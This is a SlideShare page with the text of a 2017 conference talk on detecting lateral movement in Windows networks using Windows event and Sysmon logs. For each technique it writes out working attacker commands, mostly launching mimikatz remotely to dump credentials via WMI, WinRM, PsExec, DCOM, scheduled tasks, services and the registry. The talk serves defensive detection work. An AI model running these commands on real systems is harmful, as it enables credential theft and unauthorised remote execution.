SlideShare ist ein Scribd-Unternehmen logo

Kheirkhabarov24052017_phdays7

Als PPTX, PDF herunterladen
Teymur Kheirkhabarov
Teymur Kheirkhabarov

My presentation from Positive Hack Days 7 conference

Technologie
1 von 54
Hunting Lateral Movement in Windows Infrastructure Teymur Kheirkhabarov
Who Am I • Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
What are we going to talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
Remote file copy over SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools (copy, xcopy, ropocopy…): • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
Remote File Copy over SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
Remote File Copy over SMB – the most interesting events
Hunting: search for administrative shares connections
Windows File Auditing https://www.malwarearchaeology.com/s/Windows- File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for files creation/changes in autostart locations
Remote execution via WMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
Remote execution via WMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
Remote execution via WMI – the most interesting events
Remote execution via WinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
Remote execution via WinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
Remote execution via WinRM – the most interesting events
Remote execution via Powershell Remoting • Powershell scripts • Powershell cmdline: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • Enter-PSSession -ComputerName COMPUTER -Credential USER How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
Remote execution via Powershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
Remote execution via Powershell Remoting – the most interesting events
Remote execution via MMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
Remote execution via MMC20.Application COM – the most interesting events
Remote execution via PsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
Remote execution via PsExec (& clones) – the most interesting events
Hunting: search for PsExec (& clones) artifacts – services
Hunting: search for PsExec (& clones) artifacts – access to pipes
Remote execution via PsExec (& clones) – the most interesting events
Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
Remote execution via ShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Remote execution via ShellBrowserWindow COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
Remote execution via via ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
Remote execution via Scheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
Remote execution via Scheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting events in Microsoft-Windows-TaskScheduler/Operational log
Remote execution via Scheduled Tasks – the most interesting events
Hunting: search for remotely created or updated scheduler tasks
Remote execution via Scheduled Tasks – the most interesting events
Hunting: search for ATSVC pipe connections
Remote execution via Services • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
Remote execution via Services – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
Remote execution via Services – the most interesting events
Hunting: search for remotely created services
Remote registry How • Programmatically • Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
Remote registry – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
Remote Registry – the most interesting events
Hunting: search for WINREG pipe connections
Windows Registry Auditing https://www.malwarearchaeology.com/s/Windows- Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for changes in autostart registry keys
Remote WMI subscriptions creation $filterName = 'TestFilter’ $consumerName = 'TestConsumer’ $exePath = 'C:WindowsSystem32calc.exe' $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" $WMIEventFilter = Set-WmiInstance -ComputerName pc0002 -Class __EventFilter - NameSpace "rootsubscription" -Arguments @{Name=$filterName;EventNameSpace="rootcimv2";QueryLanguage="WQL";Query=$ Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -ComputerName pc0002 -Class CommandLineEventConsumer -Namespace "rootsubscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath} Set-WmiInstance -ComputerName pc0002 -Class __FilterToConsumerBinding -Namespace "rootsubscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
WMI Namespaces Auditing
Remote WMI subscriptions creation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
Remote WMI subscriptions creation – the most interesting events
The End  There are a lot of ways to remotely run executables in Windows infrastructure;  Most of them are based on the native capabilities of the Windows operating system;  Almost all of them can be detected via Windows or Sysmon logs analysis;  Out of scope: • exploitation of vulnerabilities; • third-party applications and software deployment systems (SCCM, Kaspersky Security Center, VNC, WSUS…).
Teymur Kheirkhabarov • Twitter @HeirhabarovT • http://www.linkedin.com/in/teymur-kheirkhabarov-73490867/

Empfohlen

PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Teymur Kheirkhabarov
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
Sqrrl
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang
 

Empfohlen

PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Teymur Kheirkhabarov
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
Sqrrl
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
Christopher Gerritz
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
Splunk
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
Matthew Dunwoody
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop
Hossam .M Hamed
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Florian Roth
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
Ben Boyd
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
Dhruv Majumdar
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
Sunny Neo
 
Threat Hunting Playbook.pdf
Threat Hunting Playbook.pdfThreat Hunting Playbook.pdf
Threat Hunting Playbook.pdf
laibaarsyila
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212
Florian Roth
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
Digit Oktavianto
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
Arpan Raval
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
Akash Sarode
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for Beginners
SKMohamedKasim
 
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Dragos, Inc.
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
Mauricio Velazco
 

Weitere ähnliche Inhalte

Was ist angesagt?

Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 

Was ist angesagt? (20)

Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Threat Hunting Playbook.pdf
Threat Hunting Playbook.pdfThreat Hunting Playbook.pdf
Threat Hunting Playbook.pdf
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for Beginners
 

Ähnlich wie Kheirkhabarov24052017_phdays7

Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
Mauricio Velazco
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
Royce Davis
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
Xavier Ashe
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
Enrico Scapin
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
 
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
Yan Vugenfirer
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
CODE BLUE
 

Ähnlich wie Kheirkhabarov24052017_phdays7 (20)

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
A complete guide to Node.js
A complete guide to Node.jsA complete guide to Node.js
A complete guide to Node.js
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Tick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleepTick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleep
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
HashiCorp Vault Workshop:幫 Credentials 找個窩
HashiCorp Vault Workshop:幫 Credentials 找個窩HashiCorp Vault Workshop:幫 Credentials 找個窩
HashiCorp Vault Workshop:幫 Credentials 找個窩
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick Stack
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Get started with docker &amp; dev ops
Get started with docker &amp; dev opsGet started with docker &amp; dev ops
Get started with docker &amp; dev ops
 
Journey to the Cloud
Journey to the CloudJourney to the Cloud
Journey to the Cloud
 
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
 

Kürzlich hochgeladen

Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
